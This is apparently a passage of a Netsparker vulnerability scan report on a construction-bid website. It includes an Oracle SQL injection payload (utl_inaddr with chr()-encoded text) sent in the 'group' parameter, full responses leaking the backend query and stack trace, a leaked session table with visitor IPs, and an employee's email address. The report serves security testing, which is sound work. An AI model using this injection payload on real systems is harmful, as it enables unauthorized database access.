MS-RTC LM 8)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001751426128761577">/1001751426128761577</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">208.115.111.246</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 26 12:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1001915922055110227">/1001915922055110227</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">69.147.112.168</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:23 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Yahoo Pipes 1.0</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002073102683406456">/1002073102683406456</a></font></td><td bgcolor="#DCDCDC" nowrap><font size="1">67.195.111.172</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Feb 25 05:57 AM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 01 02:02 PM</font></td><td bgcolor="#DCDCDC" nowrap><font size="1">Mar 03 02:02 PM</font></td><td bgcolor="#DCDCDC"><font size="1">Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)</font></td></tr><tr><td bgcolor="#DCDCDC"><font size="1"><a href="?function=sessions&session=/1002350286901349887">/1002350286901349887..
ORACLE Server Identified
ORACLE Server Identified
1
TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using an ORACLE Server. This is generally not a security issue and is reported here only for information purposes.
Impact
This issue is reported for information purposes only, there is no direct impact resulting from this issue.
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html CONFIRMED |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:32 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:32 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10911
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:54.944 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:32 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:32 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10911
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:54.944 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
E-mail Address Disclosure
E-mail Address Disclosure
1
TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Remedy
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData |
Found E-mails
- jim.lennington@bartwest.com
- info@questcdn.com
Request
GET /qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21107
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1438657', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1438657&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1438657&group=11&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="14"></td> <td colspan="2" width="230"> <a name="cat324403"> <div class="cat_title"><a href="/qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=453856#cat324403">Sewer and Water Construction ( 1 )</a></div> </td> </tr> <tr height="15"> <td width="14" height="15"> </td> <td width="20" height="15"></td> <td width="210" height="15"></td> 